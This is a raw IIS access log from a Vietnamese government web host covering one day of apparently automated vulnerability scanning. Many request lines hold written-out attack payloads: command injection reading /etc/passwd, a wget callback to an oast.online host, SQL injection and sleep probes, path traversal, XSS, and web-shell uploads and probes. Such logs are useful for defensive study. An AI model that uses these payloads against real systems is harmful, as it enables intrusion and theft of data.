Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 09:33:29 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 09:33:29 103.153.214.94 GET /cgi-bin/weblogin.cgi username=admin';cat+/etc/passwd 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 342 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 09:49:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 09:49:52 103.153.214.94 POST /upload - 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 339 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 10:16:31 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 10:16:30 103.153.214.94 GET /.env - 443 - 141.98.11.74 Python-urllib/3.9 - 200 0 0 522 2023-11-24 10:28:14 103.153.214.94 GET /info.html - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 https://bcvt.kontum.gov.vn/info.html 200 0 0 68 2023-11-24 10:28:50 103.153.214.94 POST / - 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 377 2023-11-24 10:28:52 103.153.214.94 GET /wp-admin/index.php - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 66 2023-11-24 10:29:29 103.153.214.94 POST /api/jsonws/invoke - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 2323 2023-11-24 10:29:29 103.153.214.94 POST /api/jsonws/invoke - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData 404 0 2 67 2023-11-24 10:37:33 103.153.214.94 GET /users/sign_in - 443 - 173.239.196.198 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 http://bcvt.kontum.gov.vn/users/sign_in 200 0 0 65 2023-11-24 10:46:54 103.153.214.94 POST / - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 75 2023-11-24 10:55:25 103.153.214.94 POST /cgi-bin/mt/mt-xmlrpc.cgi - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 75 2023-11-24 10:57:27 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew&worker=IndexNew 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 http://bcvt.kontum.gov.vn/cgi-bin/cgiServer?worker=IndexNew 200 0 0 68 2023-11-24 11:01:57 103.153.214.94 POST / - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 76 2023-11-24 11:12:35 103.153.214.94 GET / author=1 443 - 173.239.196.193 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 70 2023-11-24 11:12:35 103.153.214.94 POST / - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 67 2023-11-24 11:16:42 103.153.214.94 GET /php/ping.php hostname=|dir 443 - 173.239.196.197 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 70 2023-11-24 11:23:46 103.153.214.94 POST /account/index.php - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 69 2023-11-24 11:23:48 103.153.214.94 POST /opensis/index.php - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 79 2023-11-24 11:23:48 103.153.214.94 POST /index.php - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 63 2023-11-24 11:32:00 103.153.214.94 GET /ui/vropspluginui/rest/services/getstatus - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 69 2023-11-24 11:42:25 103.153.214.94 GET /actions/seomatic/meta-container/meta-link-container/ uri={{228*'98'}} 443 - 173.239.196.195 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 69 2023-11-24 11:42:28 103.153.214.94 GET /actions/seomatic/meta-container/all-meta-containers uri={{228*'98'}} 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 66 2023-11-24 11:48:56 103.153.214.94 POST /logupload logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 66 2023-11-24 12:02:44 103.153.214.94 POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 12:26:17 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 12:26:17 103.153.214.94 POST /apply_sec.cgi - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 357 2023-11-24 12:26:19 103.153.214.94 POST /apply_sec.cgi - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 64 2023-11-24 12:34:49 103.153.214.94 GET /users/sign_in - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 332 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 12:51:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 12:51:09 103.153.214.94 POST /AdminService/urest/v1/LogonResource - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 0 2 96 2023-11-24 12:58:06 103.153.214.94 GET /cgi-bin/cgiServer worker=IndexNew 443 - 173.239.196.192 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 71 2023-11-24 13:04:58 103.153.214.94 POST /api/v1/method.callAnon/getPasswordPolicy - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 0 2 2494 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 13:42:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 13:42:10 103.153.214.94 POST / - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 602 2023-11-24 13:42:11 103.153.214.94 POST / - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 405 0 1 65 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 14:04:36 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 14:04:36 103.153.214.94 GET / - 443 - 173.239.196.198 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 629 2023-11-24 14:11:54 103.153.214.94 GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 67 2023-11-24 14:21:24 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 78 2023-11-24 14:30:41 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/whatever 443 - 173.239.196.192 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 66 2023-11-24 14:30:41 103.153.214.94 POST /lucee/admin/imgProcess.cfm file=/../../../context/2YXBUZxI0yzD3LsXrniAimkqBEX.cfm 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 66 2023-11-24 14:30:41 103.153.214.94 POST /lucee/2YXBUZxI0yzD3LsXrniAimkqBEX.cfm - 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 405 0 1 61 2023-11-24 14:42:35 103.153.214.94 GET / - 443 - 185.216.70.5 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/76.0.3809.87+Safari/537.36 - 200 0 0 221 2023-11-24 14:56:26 103.153.214.94 GET /index.php rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- 443 - 173.239.196.197 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 68 2023-11-24 14:59:25 103.153.214.94 POST /wp-json/pie/v1/login - 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 81 2023-11-24 15:08:22 103.153.214.94 GET /wp-admin/admin-ajax.php action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx) 443 - 173.239.196.192 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 66 2023-11-24 15:21:27 103.153.214.94 POST /wp-admin/admin.php page=contest-gallery/index.php&users_management=true&option_id=1 443 - 173.239.196.194 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 15:42:53 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 15:42:53 103.153.214.94 POST /wp-comments-post.php - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 393 2023-11-24 15:42:53 103.153.214.94 GET /wp-content/plugins/imagements/images/2yxbtzr6vuujhjndz4ohjh8hv4w.php - 443 - 173.239.196.193 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 68 2023-11-24 15:43:06 103.153.214.94 GET /prweb/PRAuth/app/default/ - 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 http://bcvt.kontum.gov.vn/prweb/PRAuth/app/default/ 200 0 0 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 15:59:36 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 15:59:36 103.153.214.94 POST /wp-admin/admin-ajax.php action=uploadFontIcon 443 - 173.239.196.197 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 71 2023-11-24 15:59:36 103.153.214.94 GET /wp-content/uploads/kaswara/fonts_icon/lfqzan/fw.php - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 70 2023-11-24 16:01:51 103.153.214.94 GET /forum/ subscribe_topic=1%20union%20select%201%20and%20sleep(6) 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 69 2023-11-24 16:03:39 103.153.214.94 GET /wp-admin/admin-ajax.php action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 69 2023-11-24 16:12:33 103.153.214.94 POST /run - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 405 0 1 68 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 16:30:49 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 16:30:49 103.153.214.94 POST /wp-admin/admin-ajax.php - 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 68 2023-11-24 16:30:50 103.153.214.94 GET /wp-content/uploads/workreap-temp/2YXBUAfuxsvd4zmL8uJaRiXH4Dj.php - 443 - 173.239.196.199 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 64 2023-11-24 16:32:13 103.153.214.94 POST /webtools/control/SOAPService - 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 70 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 16:51:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 16:51:26 103.153.214.94 GET /owa/auth/x.js - 443 - 173.239.196.195 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 67 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 17:12:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 17:12:20 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 354 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 17:27:51 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 17:27:51 103.153.214.94 GET /api/v1/core/proxy/jsonprequest objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 0 2 2554 2023-11-24 17:30:51 103.153.214.94 GET /premise/front/getPingData url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 226 2023-11-24 17:36:14 103.153.214.94 GET /prweb/PRAuth/app/default/ - 443 - 173.239.196.194 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 68 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 18:04:03 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 18:04:03 103.153.214.94 GET /solr/admin/cores wt=json 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 620 2023-11-24 18:15:29 103.153.214.94 POST /lumis/portal/controller/xml/PageControllerXml.jsp - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 405 0 1 78 2023-11-24 18:23:35 103.153.214.94 GET /assets/app/something/services/AppModule.class/ - 443 - 173.239.196.199 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 69 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 19:03:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 19:03:09 103.153.214.94 GET / rest_route=/pmpro/v1/checkout_level&level_id=3&discount_code=%27%20%20union%20select%20sleep(6)%20--%20g 443 - 173.239.196.198 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 591 2023-11-24 19:03:09 103.153.214.94 GET /wp-content/plugins/paid-memberships-pro/js/pmpro-checkout.js - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 64 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-11-24 19:32:26 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-11-24 19:32:26 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/2YXBUFV2j02CfilTVJRjF7iJgEH.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 326 2023-11-24 19:32:26 103.153.214.94 GET /wp-content/plugins/wpcargo/includes/barcode.php text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=2YXBUFV2j02CfilTVJRjF7iJgEH.php 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 64 2023-11-24 19:32:28 103.153.214.94 POST /wp-content/plugins/wpcargo/includes/2YXBUFV2j02CfilTVJRjF7iJgEH.php 1=var_dump 443 - 173.239.196.195 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 405 0 1 65 2023-11-24 19:37:16 103.153.214.94 POST /webtools/control/SOAPService - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 405 0 1 346 2023-11-24 19:42:59 103.153.214.94 POST /HandleEvent - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 405 0 1 70 2023-11-24 19:50:58 103.153.214.94 POST /index.php - 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 405 0 1 65 2023-11-24 20:04:43 103.153.214.94 GET /lua/find_prefs.lua.css - 443 - 173.239.196.193 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 67 2023-11-24 20:04:45 103.153.214.94 GET /lua/find_prefs.lua.css - 443 - 173.239.196.199 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 65 2023-11-24 20:15:23 103.153.214.94 POST /goform/setmac - 443 - 173.239.196.192 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 https://bcvt.kontum.gov.vn/index.htmlr 405 0 1 70 2023-11-24 20:24:01 103.153.214.94 POST / - 443 - 173.239.196.197 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 96 2023-11-24 20:26:28 103.153.214.94 GET /appGet.cgi hook=get_cfg_clientlist() 443 - 173.239.196.193 asusrouter-- https://bcvt.kontum.gov.vn 200 0 0 69 2023-11-24 20:27:47 103.153.214.94 GET /api/experimental/patternfile order=id%3Bselect(md5(999999999))&page=0&page_size=0 443 - 173.239.196.193 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 0 2 2574 2023-11-24 20:31:58 103.153.214.94 PATCH /redfish/v1/SessionService/ResetPassword/1/ - 443 - 173.239.196.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 405 0 1 80 2023-11-24 20:31:58 103.153.214.94 POST /redfish/v1/SessionService/Sessions/ - 443 - 173.239.196.197 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 405 0 1 65 2023-11-24 20:43:15 103.153.214.94 GET /admin/index.php p=ajax-ops&op=elfinder&cmd=mkfile&name=2YXBUNnq7EVVkoOnCklFPQdNlZm.php&target=l1_Lw 443 - 173.239.196.196 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 301 0 0 221 2023-11-24 20:56:38 103.153.214.94 GET /search.php search=%22;wget+http%3A%2F%2Fclf0mb8n3tct4nj5icfgco6ii1xhn9dqx.oast.online%27;%22 443 - 173.239.196.194 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 70 2023-11-24 20:59:00 103.153.214.94 GET /widgets/knowledgebase topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 173.239.196.195 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 71 2023-11-24 21:08:41 103.153.214.94 GET / - 443 - 138.197.80.196 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/12.0.3+Safari/605.1.15 http://bcvt.kontum.gov.vn 200 0 0 682 2023-11-24 21:09:58 103.153.214.94 POST /RPC2_Login - 443 - 173.239.196.197 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 https://bcvt.kontum.gov.vn 405 0 1 69 2023-11-24 21:20:09 103.153.214.94 POST /nacos/v1/cs/configs dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld 443 - 173.239.196.198 